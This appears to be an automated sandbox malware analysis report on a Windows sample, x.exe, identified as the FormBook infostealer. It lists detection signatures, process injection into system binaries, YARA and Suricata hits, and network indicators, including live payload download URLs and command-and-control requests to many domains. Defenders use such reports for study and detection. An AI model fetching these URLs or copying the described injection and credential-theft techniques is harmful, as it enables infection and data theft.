Windows Analysis Report
x.exe

Overview

General Information

Sample name:x.exe
Analysis ID:1509400
MD5:ba5ee405d2cc8ef536634c4e8e4bf0cb
SHA1:c91ab3aba77a079926a28cabe247b5e6db3e59fe
SHA256:69d7e14e2d5fc77e347add9b897623a3615e1c9c483f9ef408b59ec44024fe94
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Suspicious RASdial Activity
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • x.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\x.exe" MD5: BA5EE405D2CC8EF536634C4E8E4BF0CB)
    • aspnet_compiler.exe (PID: 4280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 6056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • crUcuBAsmdG.exe (PID: 5380 cmdline: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5288 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • crUcuBAsmdG.exe (PID: 3260 cmdline: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5200 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ee03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.aspnet_compiler.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e003:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16112:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.aspnet_compiler.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ee03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 6364, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 4280, ProcessName: aspnet_compiler.exe
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe" , ParentImage: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe, ParentProcessId: 5380, ParentProcessName: crUcuBAsmdG.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5288, ProcessName: rasdial.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-11T15:43:06.003455+0200 | 2019696 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 89.42.218.72 | 443 | TCP
            2024-09-11T15:43:06.003455+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49706 | 89.42.218.72 | 443 | TCP
            2024-09-11T15:43:07.565181+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 89.42.218.72 | 443 | TCP

            AV Detection

            Source: https://epsys.ro/we/bin.exeAvira URL Cloud: Label: malware
            Source: x.exeReversingLabs: Detection: 21%
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: x.exeJoe Sandbox ML: detected
            Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 89.42.218.72:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: x.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: crUcuBAsmdG.exe, 00000005.00000002.3316271241.000000000054E000.00000002.00000001.01000000.00000007.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3316446902.000000000054E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdb source: x.exe
            Source: Binary string: aspnet_compiler.pdb source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3319482531.000000000511C000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdbBSJB source: x.exe
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C5BFE0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C5BFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_02C49A00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_02C4DB8F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_049E04E8

            Networking

            Source: Network trafficSuricata IDS: 2019696 - Severity 1 - ET MALWARE Possible MalDoc Payload Download Nov 11 2014 : 192.168.2.8:49706 -> 89.42.218.72:443
            Source: DNS query: www.withad.xyz
            Source: DNS query: www.takitoon.xyz
            Source: global trafficHTTP traffic detected: GET /we/bin.exe HTTP/1.1Host: epsys.roConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /we/DEMONCODER.dll HTTP/1.1Host: epsys.ro
            Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49706 -> 89.42.218.72:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 89.42.218.72:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A== HTTP/1.1Host: www.coffee-and-blends.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /mtee/?7FhphPx8=mIo06BHEAes+1ktUHg9aZX/pKZMQjyZWlUKS3fumHCh/F9Apz5MmN8cCaSJUq7K+1FNCT10frPNoaLR8s0NWGBCBd7fYdbgwZQXT0szxpSzoohttWdsUK9P7gt6l1VyO9A==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.mayawashfold.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.zz82x.topAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.wcm50.topAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.withad.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /em49/?7FhphPx8=vV5RcTk6UjJnp8cGdrCla/0gYy6e1BMmF8l1hdm9JL6NOoivCUbMAyYanCg5fgzmDPzjWpeb906PoOnUGjRvxfKMvQWnmHyH5PNq1cjGr2lL9E1sX95rHCmr3UDKreGapg==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.lanxuanz.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /2w7y/?dD=3XyH6pjxGLhPK&7FhphPx8=Lawv0YecSOnZdZmp6B7rN+coqY7pSb/9YfPVtq1IvWwToR7xRnuq3CLFfh0Vaxr7O62UC86yvXBBKTgeeftZ3A1ObV/07dRLVO5P4hXPb+DhwEJ5M29tcAJMbTexkiGgNw== HTTP/1.1Host: www.filelabel.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK HTTP/1.1Host: www.comrade.lolAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: GET /484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA== HTTP/1.1Host: www.takitoon.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficDNS traffic detected: DNS query: epsys.ro
            Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
            Source: global trafficDNS traffic detected: DNS query: www.mayawashfold.net
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.wcm50.top
            Source: global trafficDNS traffic detected: DNS query: www.withad.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.filelabel.info
            Source: global trafficDNS traffic detected: DNS query: www.comrade.lol
            Source: global trafficDNS traffic detected: DNS query: www.takitoon.xyz
            Source: global trafficDNS traffic detected: DNS query: www.pmjjewels.online
            Source: unknownHTTP traffic detected: POST /mtee/ HTTP/1.1Host: www.mayawashfold.netAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-usOrigin: http://www.mayawashfold.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeReferer: http://www.mayawashfold.net/mtee/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 11 Sep 2024 13:44:00 GMTServer: ApacheX-Frame-Options: deny
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:30 GMTContent-Type: text/htmlContent-Length: 146Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:32 GMTContent-Type: text/htmlContent-Length: 146Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:35 GMTContent-Type: text/htmlContent-Length: 146Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:37 GMTContent-Type: text/htmlContent-Length: 146Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:44 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:46 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:49 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:51 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:44:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: x.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsv
            Source: x.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://epsys.ro
            Source: x.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://epsys.rod
            Source: x.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.conXn
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: crUcuBAsmdG.exe, 00000009.00000002.3320183434.000000000544D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pmjjewels.online
            Source: crUcuBAsmdG.exe, 00000009.00000002.3320183434.000000000544D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pmjjewels.online/zksk/
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: x.exe, 00000000.00000002.3320685418.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/DEMONCODER.dll
            Source: x.exe, 00000000.00000002.3320685418.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/bin.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003149000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.00000000030DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/bin.exeDhttps://epsys.ro/we/DEMONCODER.dll
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
